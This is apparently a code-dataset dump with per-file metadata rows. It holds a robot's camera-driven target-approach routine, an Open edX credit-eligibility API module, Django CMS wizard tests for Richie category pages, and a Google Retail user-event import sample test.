        pic_q: Queue of processed camera frames.
    """
    blockFound = False
    movement.cam_up()
    # Let camera catch up before sampling a frame.
    time.sleep(2)
    # Get data of the closest object.
    target_id, angle, inches = get_closest_target(pic_q)
    adjustedAngle = corrected_angle(angle, inches)
    # (Dropped an unused adjustedDistance computation from the original.)
    if target_id == 0 or inches > 13 or adjustedAngle > 20:
        # Nothing usable straight ahead: check right and left 20 degrees.
        movement_list = [-20, 20]
        for action in movement_list:
            movement.turn(action)
            time.sleep(2)
            target_id, angle, inches = get_closest_target(pic_q)
            # Fixed: was "is not 0" — identity comparison on an int literal.
            if target_id != 0 and inches < 14:
                approach_helper(angle, inches, pic_q, movement)
                movement.turn(-1 * action)
                blockFound = True
                break
            movement.turn(-1 * action)
        if not blockFound:
            # Retry the whole scan with the camera tilted down.
            movement.cam_down()
            time.sleep(2)
            target_id, angle, inches = get_closest_target(pic_q)
            if target_id == 0 or inches > 13:
                movement_list = [-20, 20]
                for action in movement_list:
                    movement.turn(action)
                    time.sleep(2)
                    target_id, angle, inches = get_closest_target(pic_q)
                    if target_id != 0 and inches < 14:
                        # Back up so the close target fits in the frame.
                        movement.move(rev, 4)
                        approach_helper(angle, inches, pic_q, movement)
                        movement.move(fwd, 4)
                        movement.turn(-1 * action)
                        blockFound = True
                        movement.cam_up()
                        break
                    movement.turn(-1 * action)
                movement.cam_up()
            else:
                movement.move(rev, 4)
                approach_helper(angle, inches, pic_q, movement)
                movement.move(fwd, 4)
                movement.cam_up()
    else:
        # Target directly reachable from here.
        approach_helper(angle, inches, pic_q, movement)
# DONE: Refine approach. Take care of edge cases.
# EDGE CASE 1: obstacle is in way of target
# Potential solution: go to another connected tile
# DONE CASE 2: target not detected after two additional scans.
# DONE CASE 3: second object detected in background
# EDGE CASE 4: target at a very bad angle
"""
Change log
-[0.0.1] Benji
--- Changed sleep from 2 to 1.5; lowest fps is .75 so sleeping
--- for 1.5 seconds is the minimum delay that guarantees fresh video data
-[0.0.2] Rishav
--- Remove recursion as results not satisfying.
"""
def approach_obstacle(movement, pic_q):
    """Scan for the closest obstacle and, if reachable, drive in and handle it.

    Mirrors approach(), but without the 4-inch back-up before the camera-down
    helper calls.

    FIXME(review): get_closest_obstacle and approach_obstacle_helper are not
    imported or defined in this module — calling this function raises
    NameError until they are provided.

    Args:
        movement: Robot movement controller.
        pic_q: Queue of processed camera frames.
    """
    blockFound = False
    movement.cam_up()
    # Let camera catch up before sampling a frame.
    time.sleep(2)
    # Get data of the closest object.
    target_id, angle, inches = get_closest_obstacle(pic_q)
    adjustedAngle = corrected_angle(angle, inches)
    # (Dropped an unused adjustedDistance computation from the original.)
    if target_id == 0 or inches > 13 or adjustedAngle > 20:
        # Nothing usable straight ahead: check right and left 20 degrees.
        movement_list = [-20, 20]
        for action in movement_list:
            movement.turn(action)
            time.sleep(2)
            target_id, angle, inches = get_closest_obstacle(pic_q)
            # Fixed: was "is not 0" — identity comparison on an int literal.
            if target_id != 0 and inches < 14:
                approach_obstacle_helper(angle, inches, pic_q, movement)
                movement.turn(-1 * action)
                blockFound = True
                break
            movement.turn(-1 * action)
        if not blockFound:
            # Retry the whole scan with the camera tilted down.
            movement.cam_down()
            time.sleep(2)
            target_id, angle, inches = get_closest_obstacle(pic_q)
            if target_id == 0 or inches > 13:
                movement_list = [-20, 20]
                for action in movement_list:
                    movement.turn(action)
                    time.sleep(2)
                    target_id, angle, inches = get_closest_obstacle(pic_q)
                    if target_id != 0 and inches < 14:
                        approach_obstacle_helper(angle, inches, pic_q, movement)
                        movement.turn(-1 * action)
                        blockFound = True
                        movement.cam_up()
                        break
                    movement.turn(-1 * action)
                movement.cam_up()
            else:
                approach_obstacle_helper(angle, inches, pic_q, movement)
                movement.cam_up()
    else:
        # Obstacle directly reachable from here.
        approach_obstacle_helper(angle, inches, pic_q, movement)
| 39.225962 | 101 | 0.606937 |
795469960aecdbbb44cae22674d64b053bd39746 | 85 | py | Python | threatbutt/__init__.py | ivanlei/threatbutt | faff507a4bebfa585d3044427111418c257c34ec | [
"Apache-2.0"
] | 55 | 2015-04-25T07:22:18.000Z | 2021-05-23T15:04:52.000Z | threatbutt/__init__.py | ivanlei/threatbutt | faff507a4bebfa585d3044427111418c257c34ec | [
"Apache-2.0"
] | null | null | null | threatbutt/__init__.py | ivanlei/threatbutt | faff507a4bebfa585d3044427111418c257c34ec | [
"Apache-2.0"
] | 8 | 2015-04-27T03:51:49.000Z | 2021-04-28T22:17:18.000Z | # -*- coding: utf-8 -*-
from .threatbutt import ThreatButt
__all__ = ['ThreatButt']
| 17 | 34 | 0.670588 |
79546aa0b4fdb7803f31d7386c0d88c52ff6efe1 | 16,191 | py | Python | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/credit/api/eligibility.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | 3 | 2021-12-15T04:58:18.000Z | 2022-02-06T12:15:37.000Z | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/credit/api/eligibility.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | null | null | null | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/credit/api/eligibility.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | 1 | 2019-01-02T14:38:50.000Z | 2019-01-02T14:38:50.000Z | """
APIs for configuring credit eligibility requirements and tracking
whether a user has satisfied those requirements.
"""
import logging
from opaque_keys.edx.keys import CourseKey
from common.djangoapps.course_modes.models import CourseMode
from openedx.core.djangoapps.credit.email_utils import send_credit_notifications
from openedx.core.djangoapps.credit.exceptions import InvalidCreditCourse, InvalidCreditRequirements
from openedx.core.djangoapps.credit.models import (
CreditCourse,
CreditEligibility,
CreditRequest,
CreditRequirement,
CreditRequirementStatus
)
from common.djangoapps.student.models import CourseEnrollment
# TODO: Cleanup this mess! ECOM-2908
log = logging.getLogger(__name__)
def is_credit_course(course_key):
    """
    Check whether the course has been configured for credit.

    Thin wrapper around ``CreditCourse.is_credit_course``.

    Args:
        course_key (CourseKey): Identifier of the course.

    Returns:
        bool: True iff this is a credit course.
    """
    return CreditCourse.is_credit_course(course_key=course_key)
def set_credit_requirements(course_key, requirements):
    """
    Add requirements to given course.

    Args:
        course_key(CourseKey): The identifier for course
        requirements(list): List of requirements to be added

    Example:
        >>> set_credit_requirements(
                "course-v1-edX-DemoX-1T2015",
                [
                    {
                        "namespace": "proctored_exam",
                        "name": "i4x://edX/DemoX/proctoring-block/final_uuid",
                        "display_name": "Final Exam",
                        "criteria": {},
                    },
                    {
                        "namespace": "grade",
                        "name": "grade",
                        "display_name": "Grade",
                        "criteria": {"min_grade": 0.8},
                    },
                ])

    Raises:
        InvalidCreditRequirements: If any requirement dict is malformed.
        InvalidCreditCourse: If the course is not configured for credit.

    Returns:
        None
    """
    # Validate every requirement dict up front and report all invalid ones.
    invalid_requirements = _validate_requirements(requirements)
    if invalid_requirements:
        invalid_requirements = ", ".join(invalid_requirements)
        raise InvalidCreditRequirements(invalid_requirements)

    try:
        credit_course = CreditCourse.get_credit_course(course_key=course_key)
    except CreditCourse.DoesNotExist:
        raise InvalidCreditCourse()  # lint-amnesty, pylint: disable=raise-missing-from

    # Disable existing requirements that are absent from the incoming list.
    old_requirements = CreditRequirement.get_course_requirements(course_key=course_key)
    requirements_to_disable = _get_requirements_to_disable(old_requirements, requirements)
    if requirements_to_disable:
        CreditRequirement.disable_credit_requirements(requirements_to_disable)

    # sort_value preserves the caller-supplied ordering of requirements.
    for sort_value, requirement in enumerate(requirements):
        CreditRequirement.add_or_update_course_requirement(credit_course, requirement, sort_value)
def get_credit_requirements(course_key, namespace=None):
    """
    Retrieve the credit eligibility requirements configured for a course.

    Args:
        course_key (CourseKey): The identifier for the course.
        namespace (str): Optional namespace to filter the requirements by
            (e.g. "grade" or "proctored_exam").

    Returns:
        list: One dict per requirement with keys "namespace", "name",
        "display_name" and "criteria", e.g.::

            [
                {
                    "namespace": "grade",
                    "name": "grade",
                    "display_name": "Grade",
                    "criteria": {"min_grade": 0.8},
                },
            ]
    """
    requirement_dicts = []
    for requirement in CreditRequirement.get_course_requirements(course_key, namespace):
        requirement_dicts.append({
            "namespace": requirement.namespace,
            "name": requirement.name,
            "display_name": requirement.display_name,
            "criteria": requirement.criteria,
        })
    return requirement_dicts
def is_user_eligible_for_credit(username, course_key):
    """
    Returns a boolean indicating if the user is eligible for credit for
    the given course

    Args:
        username(str): The identifier for user
        course_key (CourseKey): The identifier for course

    Returns:
        bool: True if user is eligible for the course else False

    Note:
        Argument order here is (username, course_key) while the underlying
        model call takes (course_key, username).
    """
    return CreditEligibility.is_user_eligible_for_credit(course_key, username)
def get_eligibilities_for_user(username, course_key=None):
    """
    Retrieve the courses for which the user is eligible for credit.

    Args:
        username (unicode): Identifier of the user.
        course_key (unicode): Optional course identifier; when given, only
            the eligibility for that course is returned.

    Returns:
        list: One dict per eligibility, e.g.::

            [
                {"course_key": "edX/Demo_101/Fall", "deadline": "2015-10-23"},
                {"course_key": "edX/Demo_201/Spring", "deadline": "2015-11-15"},
            ]
    """
    eligibilities = CreditEligibility.get_user_eligibilities(username)
    if course_key:
        eligibilities = eligibilities.filter(
            course__course_key=CourseKey.from_string(str(course_key))
        )
    results = []
    for eligibility in eligibilities:
        results.append({
            "course_key": str(eligibility.course.course_key),
            "deadline": eligibility.deadline,
        })
    return results
def set_credit_requirement_status(user, course_key, req_namespace, req_name, status="satisfied", reason=None):
    """
    Update the user's requirement status.

    This will record whether the user satisfied or failed a particular requirement
    in a course. If the user has satisfied all requirements, the user will be marked
    as eligible for credit in the course.

    Args:
        user(User): User object to set credit requirement for.
        course_key (CourseKey): Identifier for the course associated with the requirement.
        req_namespace (str): Namespace of the requirement (e.g. "grade" or "reverification")
        req_name (str): Name of the requirement (e.g. "grade" or the location of the ICRV XBlock)

    Keyword Arguments:
        status (str): Status of the requirement (either "satisfied" or "failed")
        reason (dict): Reason of the status

    Returns:
        None: Returns silently (without updating) when the enrollment is not
        credit-eligible, when credit has already been requested, when a
        "failed" status would revoke earned eligibility, or when the
        requirement cannot be found.
    """
    # Check whether user has credit eligible enrollment.
    enrollment_mode, is_active = CourseEnrollment.enrollment_mode_for_user(user, course_key)
    has_credit_eligible_enrollment = (CourseMode.is_credit_eligible_slug(enrollment_mode) and is_active)

    # Refuse to set status of requirement if the user enrollment is not credit eligible.
    if not has_credit_eligible_enrollment:
        return

    # Do not allow students who have requested credit to change their eligibility
    if CreditRequest.get_user_request_status(user.username, course_key):
        log.info(
            'Refusing to set status of requirement with namespace "%s" and name "%s" because the '
            'user "%s" has already requested credit for the course "%s".',
            req_namespace, req_name, user.username, course_key
        )
        return

    # Do not allow a student who has earned eligibility to un-earn eligibility
    eligible_before_update = CreditEligibility.is_user_eligible_for_credit(course_key, user.username)
    if eligible_before_update and status == 'failed':
        log.info(
            'Refusing to set status of requirement with namespace "%s" and name "%s" to "failed" because the '
            'user "%s" is already eligible for credit in the course "%s".',
            req_namespace, req_name, user.username, course_key
        )
        return

    # Retrieve all credit requirements for the course
    # We retrieve all of them to avoid making a second query later when
    # we need to check whether all requirements have been satisfied.
    reqs = CreditRequirement.get_course_requirements(course_key)

    # Find the requirement we're trying to set
    req_to_update = next((
        req for req in reqs
        if req.namespace == req_namespace and req.name == req_name
    ), None)

    # If we can't find the requirement, then the most likely explanation
    # is that there was a lag updating the credit requirements after the course
    # was published. We *could* attempt to create the requirement here,
    # but that could cause serious performance issues if many users attempt to
    # lock the row at the same time.
    # Instead, we skip updating the requirement and log an error.
    if req_to_update is None:
        log.error(
            (
                'Could not update credit requirement in course "%s" '
                'with namespace "%s" and name "%s" '
                'because the requirement does not exist. '
                'The user "%s" should have had their status updated to "%s".'
            ),
            str(course_key), req_namespace, req_name, user.username, status
        )
        return

    # Update the requirement status
    CreditRequirementStatus.add_or_update_requirement_status(
        user.username, req_to_update, status=status, reason=reason
    )

    # If we're marking this requirement as "satisfied", there's a chance that the user has met all eligibility
    # requirements, and should be notified. However, if the user was already eligible, do not send another notification.
    if status == "satisfied" and not eligible_before_update:
        is_eligible, eligibility_record_created = CreditEligibility.update_eligibility(reqs, user.username, course_key)
        if eligibility_record_created and is_eligible:
            try:
                send_credit_notifications(user.username, course_key)
            except Exception:  # pylint: disable=broad-except
                # Notification failure must not roll back the status update.
                log.exception("Error sending email")
def remove_credit_requirement_status(username, course_key, req_namespace, req_name):
    """
    Delete a user's status record for one credit requirement.

    Only the row in the credit requirement status table is removed; any
    eligibility the user has already earned for the course is left intact.

    Args:
        username (str): Username of the user
        course_key (CourseKey): Identifier for the course associated
            with the requirement.
        req_namespace (str): Namespace of the requirement
            (e.g. "grade" or "reverification")
        req_name (str): Name of the requirement
            (e.g. "grade" or the location of the ICRV XBlock)
    """
    # Look up the requirement whose status record should be deleted.
    requirement = CreditRequirement.get_course_requirement(course_key, req_namespace, req_name)
    if requirement:
        CreditRequirementStatus.remove_requirement_status(username, requirement)
        return
    # A missing requirement most likely means the course's credit requirements
    # lagged behind publication.  Removing/creating it here could cause serious
    # row-locking contention if many users hit this path at once, so we skip
    # the removal and log an error instead.
    log.error(
        (
            'Could not remove credit requirement in course "%s" '
            'with namespace "%s" and name "%s" '
            'because the requirement does not exist. '
        ),
        str(course_key), req_namespace, req_name
    )
def get_credit_requirement_status(course_key, username, namespace=None, name=None):
    """Return the user's status for each credit requirement in the course.

    Args:
        course_key (CourseKey): The identifier for course
        username (str): The identifier of the user
        namespace (str): Optional filter on the requirements' namespace
        name (str): Optional filter on the requirements' name

    Returns:
        list of dicts, one per requirement, each containing the requirement's
        "namespace", "name", "display_name", "criteria" and "order", plus the
        user's "reason", "status" and "status_date" (all three are None when
        the user has no status record for that requirement).

    Example:
        >>> get_credit_requirement_status("course-v1-edX-DemoX-1T2015", "john")
        [
            {
                "namespace": "grade",
                "name": "i4x://edX/DemoX/proctoring-block/final_uuid",
                "display_name": "Minimum Passing Grade",
                "criteria": {"min_grade": 0.8},
                "reason": {"final_grade": 0.95},
                "status": "satisfied",
                "status_date": "2015-06-26 11:07:44",
                "order": 2,
            },
        ]
    """
    requirements = CreditRequirement.get_course_requirements(course_key, namespace=namespace, name=name)
    # Index the user's status records by requirement so the loop below is a
    # cheap dictionary lookup instead of a per-requirement scan.
    status_by_requirement = {
        status.requirement: status
        for status in CreditRequirementStatus.get_statuses(requirements, username)
    }
    statuses = []
    for requirement in requirements:
        status = status_by_requirement.get(requirement)
        statuses.append({
            "namespace": requirement.namespace,
            "name": requirement.name,
            "display_name": requirement.display_name,
            "criteria": requirement.criteria,
            "reason": status.reason if status else None,
            "status": status.status if status else None,
            "status_date": status.modified if status else None,
            # We retain the old name "order" in the API because changing APIs
            # takes a lot more coordination.
            "order": requirement.sort_value,
        })
    return statuses
def _get_requirements_to_disable(old_requirements, new_requirements):
"""
Get the ids of 'CreditRequirement' entries to be disabled that are
deleted from the courseware.
Args:
old_requirements(QuerySet): QuerySet of CreditRequirement
new_requirements(list): List of requirements being added
Returns:
List of ids of CreditRequirement that are not in new_requirements
"""
requirements_to_disable = []
for old_req in old_requirements:
found_flag = False
for req in new_requirements:
# check if an already added requirement is modified
if req["namespace"] == old_req.namespace and req["name"] == old_req.name:
found_flag = True
break
if not found_flag:
requirements_to_disable.append(old_req.id)
return requirements_to_disable
def _validate_requirements(requirements):
"""
Validate the requirements.
Args:
requirements(list): List of requirements
Returns:
List of strings of invalid requirements
"""
invalid_requirements = []
for requirement in requirements:
invalid_params = []
if not requirement.get("namespace"):
invalid_params.append("namespace")
if not requirement.get("name"):
invalid_params.append("name")
if not requirement.get("display_name"):
invalid_params.append("display_name")
if "criteria" not in requirement:
invalid_params.append("criteria")
if invalid_params:
invalid_requirements.append(
"{requirement} has missing/invalid parameters: {params}".format(
requirement=requirement,
params=invalid_params,
)
)
return invalid_requirements
| 36.881549 | 120 | 0.6293 |
79546b27853b436a4e474d9be42a32f74248b522 | 15,802 | py | Python | tests/apps/courses/test_cms_wizards_category.py | openfun/richie | 185b2be74ce75de8de1da159773afc43e365df3e | [
"MIT"
] | 174 | 2018-04-14T23:36:01.000Z | 2022-03-10T09:27:01.000Z | tests/apps/courses/test_cms_wizards_category.py | EDUlib/richie | 3f9b14b929641f9392e54ba9badbb7a9a9fe7d44 | [
"MIT"
] | 631 | 2018-04-04T11:28:53.000Z | 2022-03-31T11:18:31.000Z | tests/apps/courses/test_cms_wizards_category.py | EDUlib/richie | 3f9b14b929641f9392e54ba9badbb7a9a9fe7d44 | [
"MIT"
] | 64 | 2018-06-27T08:35:01.000Z | 2022-03-10T09:27:43.000Z | """
Test suite for the wizard creating a new Category page
"""
from django.core.exceptions import PermissionDenied
from django.urls import reverse
from cms.api import Page, create_page
from cms.test_utils.testcases import CMSTestCase
from richie.apps.core.factories import UserFactory
from richie.apps.courses.cms_wizards import CategoryWizardForm
from richie.apps.courses.factories import CategoryFactory
from richie.apps.courses.models import Category
class CategoryCMSWizardTestCase(CMSTestCase):
    """Testing the wizard that is used to create new category pages from the CMS.

    Covers two areas: visibility of the wizard on the wizards list page
    (permission-gated) and validation/side effects of submitting the
    CategoryWizardForm (parent-page resolution, slug generation and limits).
    """
    # Wizards list
    def test_cms_wizards_category_create_wizards_list_superuser(self):
        """
        The wizard to create a new category page should be present on the wizards list page
        for a superuser.
        """
        page = create_page("page", "richie/single_column.html", "en")
        user = UserFactory(is_staff=True, is_superuser=True)
        self.client.login(username=user.username, password="password")
        # Let the authorized user get the page with all wizards listed
        reverse_id = reverse("cms_wizard_create")
        url = f"{reverse_id:s}?page={page.id:d}"
        response = self.client.get(url)
        # Check that our wizard to create categories is on this page
        self.assertContains(
            response,
            '<span class="info">Create a new category page</span>',
            status_code=200,
            html=True,
        )
        self.assertContains(response, "<strong>New category page</strong>", html=True)
    def test_cms_wizards_category_create_wizards_list_insufficient_permissions(self):
        """
        The wizard to create a new category page should not be present on the wizards list page
        for a user with insufficient permissions.
        """
        any_page = create_page("page", "richie/single_column.html", "en")
        required_permissions = ["courses.add_category"]
        reverse_id = reverse("cms_wizard_create")
        url = f"{reverse_id:s}?page={any_page.id:d}"
        # Try every combination with exactly one required permission missing
        for permission_to_be_removed in required_permissions + [None]:
            if permission_to_be_removed is None:
                # This is the case of sufficient permissions treated in the next test
                continue
            altered_permissions = required_permissions.copy()
            if permission_to_be_removed:
                altered_permissions.remove(permission_to_be_removed)
            user = UserFactory(is_staff=True, permissions=altered_permissions)
            self.client.login(username=user.username, password="password")
            # Let the authorized user get the page with all wizards listed
            response = self.client.get(url)
            # Check that our wizard to create categories is not on this page
            self.assertNotContains(response, "category", status_code=200, html=True)
    def test_cms_wizards_category_create_wizards_list_user_with_permissions(self):
        """
        The wizard to create a new category page should be present on the wizards list page
        for a user with the required permissions.
        """
        page = create_page("page", "richie/single_column.html", "en")
        # Login with a user with just the required permissions
        user = UserFactory(
            is_staff=True,
            permissions=["courses.add_category", "cms.add_page", "cms.change_page"],
        )
        self.client.login(username=user.username, password="password")
        # Let the authorized user get the page with all wizards listed
        reverse_id = reverse("cms_wizard_create")
        url = f"{reverse_id:s}?page={page.id:d}"
        response = self.client.get(url)
        # Check that our wizard to create categories is on this page
        self.assertContains(
            response,
            '<span class="info">Create a new category page</span>',
            status_code=200,
            html=True,
        )
        self.assertContains(response, "<strong>New category page</strong>", html=True)
    # Form submission
    def test_cms_wizards_category_submit_form_insufficient_permission(self):
        """
        A user with insufficient permissions trying to submit a CategoryWizardForm should trigger
        a PermissionDenied exception.
        We make loop to remove each time only one permission from the set of required permissions
        and check that they are all required.
        """
        # We want to create the category from an ordinary page
        any_page = create_page("Any page", "richie/single_column.html", "en")
        # A parent page should pre-exist
        create_page(
            "Categories",
            "richie/single_column.html",
            "en",
            reverse_id=Category.PAGE["reverse_id"],
        )
        required_permissions = ["courses.add_category"]
        for is_staff in [True, False]:
            for permission_to_be_removed in required_permissions + [None]:
                if is_staff is True and permission_to_be_removed is None:
                    # This is the case of sufficient permissions treated in the next test
                    continue
                altered_permissions = required_permissions.copy()
                if permission_to_be_removed:
                    altered_permissions.remove(permission_to_be_removed)
                user = UserFactory(is_staff=is_staff, permissions=altered_permissions)
                form = CategoryWizardForm(
                    data={"title": "My title"},
                    wizard_language="en",
                    wizard_user=user,
                    wizard_page=any_page,
                )
                # Validation itself should be forbidden for this user
                with self.assertRaises(PermissionDenied):
                    form.is_valid()
    def test_cms_wizards_category_submit_form_from_any_page(self):
        """
        A user with the required permissions submitting a valid CategoryWizardForm from any page
        should be able to create a category at the top of the category tree and its related page.
        """
        # We want to create the category from an ordinary page
        any_page = create_page("Any page", "richie/single_column.html", "en")
        # A parent page should pre-exist
        parent_page = create_page(
            "Categories",
            "richie/single_column.html",
            "en",
            reverse_id=Category.PAGE["reverse_id"],
        )
        # Create a user with just the required permissions
        user = UserFactory(
            is_staff=True,
            permissions=["courses.add_category", "cms.add_page", "cms.change_page"],
        )
        # We can submit a form with just the title set
        form = CategoryWizardForm(
            data={"title": "My title"},
            wizard_language="en",
            wizard_user=user,
            wizard_page=any_page,
        )
        self.assertTrue(form.is_valid())
        page = form.save()
        # Related page should have been created as draft
        Page.objects.drafts().get(id=page.id)
        Category.objects.get(id=page.category.id, extended_object=page)
        self.assertEqual(page.get_parent_page(), parent_page)
        self.assertEqual(page.get_title(), "My title")
        # The slug should have been automatically set
        self.assertEqual(page.get_slug(), "my-title")
    def test_cms_wizards_category_submit_form_from_category_page(self):
        """
        Submitting a valid CategoryWizardForm from a category should create a sub category of this
        category and its related page.
        """
        # A parent page should pre-exist
        create_page(
            "Categories",
            "richie/single_column.html",
            "en",
            reverse_id=Category.PAGE["reverse_id"],
        )
        # Create a category when visiting an existing category
        parent_category = CategoryFactory()
        # Create a user with just the required permissions
        user = UserFactory(
            is_staff=True,
            permissions=["courses.add_category", "cms.add_page", "cms.change_page"],
        )
        # We can submit a form with just the title set
        form = CategoryWizardForm(
            data={"title": "My title"},
            wizard_language="en",
            wizard_user=user,
            wizard_page=parent_category.extended_object,
        )
        self.assertTrue(form.is_valid())
        page = form.save()
        # Related page should have been created as draft
        Page.objects.drafts().get(id=page.id)
        Category.objects.get(id=page.category.id, extended_object=page)
        self.assertEqual(page.get_parent_page(), parent_category.extended_object)
        self.assertEqual(page.get_title(), "My title")
        # The slug should have been automatically set
        self.assertEqual(page.get_slug(), "my-title")
    def test_cms_wizards_category_submit_form_max_lengths(self):
        """
        Check that the form correctly raises an error when the slug is too long. The path built
        by combining the slug of the page with the slug of its parent page, should not exceed
        255 characters in length.
        """
        # A parent page with a very long slug
        page = create_page(
            "y" * 200,
            "richie/single_column.html",
            "en",
            reverse_id=Category.PAGE["reverse_id"],
        )
        # A category with a slug at the limit length should work
        user = UserFactory(is_staff=True, is_superuser=True)
        form = CategoryWizardForm(
            data={"title": "t" * 255, "slug": "s" * 54},
            wizard_language="en",
            wizard_user=user,
            wizard_page=page,
        )
        self.assertTrue(form.is_valid())
        form.save()
        # A category with a slug too long with regards to the parent's one should raise an error
        form = CategoryWizardForm(
            data={"title": "t" * 255, "slug": "s" * 55},
            wizard_language="en",
            wizard_user=user,
            wizard_page=page,
        )
        self.assertFalse(form.is_valid())
        self.assertEqual(
            form.errors["slug"][0],
            (
                "This slug is too long. The length of the path built by prepending the slug of "
                "the parent page would be 256 characters long and it should be less than 255"
            ),
        )
    def test_cms_wizards_category_submit_form_slugify_long_title(self):
        """
        When generating the slug from the title, we should respect the slug's "max_length"
        """
        # A parent page should pre-exist
        page = create_page(
            "Categories",
            "richie/single_column.html",
            "en",
            reverse_id=Category.PAGE["reverse_id"],
        )
        # Submit a title at max length
        data = {"title": "t" * 255}
        user = UserFactory(is_staff=True, is_superuser=True)
        form = CategoryWizardForm(
            data=data, wizard_language="en", wizard_user=user, wizard_page=page
        )
        self.assertTrue(form.is_valid())
        page = form.save()
        # Check that the slug has been truncated
        self.assertEqual(page.get_slug(), "t" * 200)
    def test_cms_wizards_category_submit_form_title_too_long(self):
        """
        Trying to set a title that is too long should make the form invalid
        """
        # A parent page should pre-exist
        page = create_page(
            "Categories",
            "richie/single_column.html",
            "en",
            reverse_id=Category.PAGE["reverse_id"],
        )
        # Submit a title that is too long and a slug that is ok
        invalid_data = {"title": "t" * 256, "slug": "s" * 200}
        user = UserFactory(is_staff=True, is_superuser=True)
        form = CategoryWizardForm(
            data=invalid_data, wizard_language="en", wizard_user=user, wizard_page=page
        )
        self.assertFalse(form.is_valid())
        # Check that the title being too long is a cause for the invalid form
        self.assertEqual(
            form.errors["title"],
            ["Ensure this value has at most 255 characters (it has 256)."],
        )
    def test_cms_wizards_category_submit_form_slug_too_long(self):
        """
        Trying to set a slug that is too long should make the form invalid
        """
        # A parent page should pre-exist
        # NOTE(review): "Sujects" looks like a typo for "Subjects" — harmless
        # fixture title, kept as-is to avoid changing runtime strings.
        page = create_page(
            "Sujects",
            "richie/single_column.html",
            "en",
            reverse_id=Category.PAGE["reverse_id"],
        )
        # Submit a slug that is too long and a title that is ok
        invalid_data = {"title": "t" * 255, "slug": "s" * 201}
        user = UserFactory(is_staff=True, is_superuser=True)
        form = CategoryWizardForm(
            data=invalid_data, wizard_language="en", wizard_user=user, wizard_page=page
        )
        self.assertFalse(form.is_valid())
        # Check that the slug being too long is a cause for the invalid form
        self.assertEqual(
            form.errors["slug"],
            ["Ensure this value has at most 200 characters (it has 201)."],
        )
    def test_cms_wizards_category_submit_form_invalid_slug(self):
        """Trying to submit a slug that is not valid should raise a 400 exception."""
        # A parent page should pre-exist
        parent_page = create_page(
            "Categories",
            "richie/single_column.html",
            "en",
            reverse_id=Category.PAGE["reverse_id"],
        )
        # Submit an invalid slug
        data = {"title": "my title", "slug": "invalid slug"}
        user = UserFactory(is_superuser=True, is_staff=True)
        form = CategoryWizardForm(data=data, wizard_language="en", wizard_user=user)
        # NOTE(review): sets form.page directly instead of passing wizard_page
        # like the other tests — presumably intentional; verify against the form
        form.page = parent_page
        self.assertFalse(form.is_valid())
        self.assertEqual(
            form.errors["slug"][0],
            "Enter a valid “slug” consisting of letters, numbers, underscores or hyphens.",
        )
    def test_cms_wizards_category_submit_form_slug_duplicate(self):
        """
        Trying to create a category with a slug that would lead to a duplicate path should
        raise a validation error.
        """
        # A parent page should pre-exist
        parent_page = create_page(
            "Categories",
            "richie/single_column.html",
            "en",
            reverse_id=Category.PAGE["reverse_id"],
        )
        # Create an existing page with a known slug
        CategoryFactory(page_parent=parent_page, page_title="My title")
        # Submit a title that will lead to the same slug
        data = {"title": "my title"}
        user = UserFactory(is_staff=True, is_superuser=True)
        form = CategoryWizardForm(
            data=data, wizard_language="en", wizard_user=user, wizard_page=parent_page
        )
        self.assertFalse(form.is_valid())
        self.assertEqual(form.errors, {"slug": ["This slug is already in use"]})
    def test_cms_wizards_category_root_page_should_exist(self):
        """
        We should not be able to create a category page if the root page does not exist
        """
        page = create_page("page", "richie/single_column.html", "en")
        user = UserFactory(is_staff=True, is_superuser=True)
        form = CategoryWizardForm(
            data={"title": "My title", "slug": "my-title"},
            wizard_language="en",
            wizard_user=user,
            wizard_page=page,
        )
        self.assertFalse(form.is_valid())
        self.assertEqual(
            form.errors,
            {
                "slug": [
                    "You must first create a parent page and set its `reverse_id` to `categories`."
                ]
            },
        )
| 38.447689 | 99 | 0.614416 |
79546b4038a0189a4b01d776e87766c44acc4791 | 1,479 | py | Python | samples/interactive-tutorials/events/import_user_events_inline_test.py | tetiana-karasova/python-retail | b834c1fb16212e59241267e18d38b490e962af7f | [
"Apache-2.0"
] | 1 | 2022-02-11T14:00:31.000Z | 2022-02-11T14:00:31.000Z | samples/interactive-tutorials/events/import_user_events_inline_test.py | tetiana-karasova/python-retail | b834c1fb16212e59241267e18d38b490e962af7f | [
"Apache-2.0"
] | null | null | null | samples/interactive-tutorials/events/import_user_events_inline_test.py | tetiana-karasova/python-retail | b834c1fb16212e59241267e18d38b490e962af7f | [
"Apache-2.0"
] | 2 | 2022-01-28T09:53:16.000Z | 2022-02-07T14:27:38.000Z | # Copyright 2022 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import subprocess
def test_create_product():
    """Smoke-test the inline user-events import sample.

    Runs the sample script as a subprocess and checks its console output for
    the expected request, operation and result messages.
    """
    # str() of the raw bytes keeps everything on a single line, so the '.*'
    # patterns below can span what were originally separate output lines.
    raw_output = subprocess.check_output(
        "python import_user_events_inline.py", shell=True
    )
    output = str(raw_output)
    expected_patterns = (
        '.*import user events from inline source request.*?parent: "projects/.*?/locations/global/catalogs/default_catalog.*',
        ".*import user events from inline source request.*?input_config.*?user_event_inline_source.*",
        ".*the operation was started.*?projects/.*?/locations/global/catalogs/default_catalog/operations/import-user-events.*",
        ".*import user events operation is done.*",
        ".*number of successfully imported events.*?3.*",
        ".*number of failures during the importing.*?0.*",
    )
    for pattern in expected_patterns:
        assert re.match(pattern, output)
| 37.923077 | 127 | 0.709263 |
79546b9f73613f57d4634ebe00f96e4354b83837 | 1,057 | py | Python | app/models.py | afexer/apache-gunicorn-flask-socketio | 8d7a1c9475ea7f3f1955d38f5c529a9e23215771 | [
"MIT"
